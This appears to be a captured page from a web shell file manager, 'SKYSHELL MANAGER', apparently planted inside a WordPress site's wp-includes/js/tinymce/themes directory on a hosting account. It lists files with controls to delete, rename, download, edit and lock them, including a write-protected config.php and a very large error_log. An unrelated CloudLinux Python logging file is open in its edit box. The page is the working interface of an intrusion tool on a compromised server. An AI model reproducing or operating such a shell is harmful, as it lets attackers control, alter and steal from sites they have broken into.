📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
39665.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: _logs.py
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2023 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXTimport logging import logging logger = logging.getLogger('LveLimitsBurster') # root_logger = logging.getLogger() # root_logger.setLevel(logging.INFO) # for i in range(len(root_logger.handlers)): # if isinstance(root_logger.handlers[i], logging.FileHandler): # # log debug messages to /var/log/lve-stats.log only # root_logger.handlers[i].setLevel(logging.DEBUG) # logger.setLevel(logging.DEBUG)
Save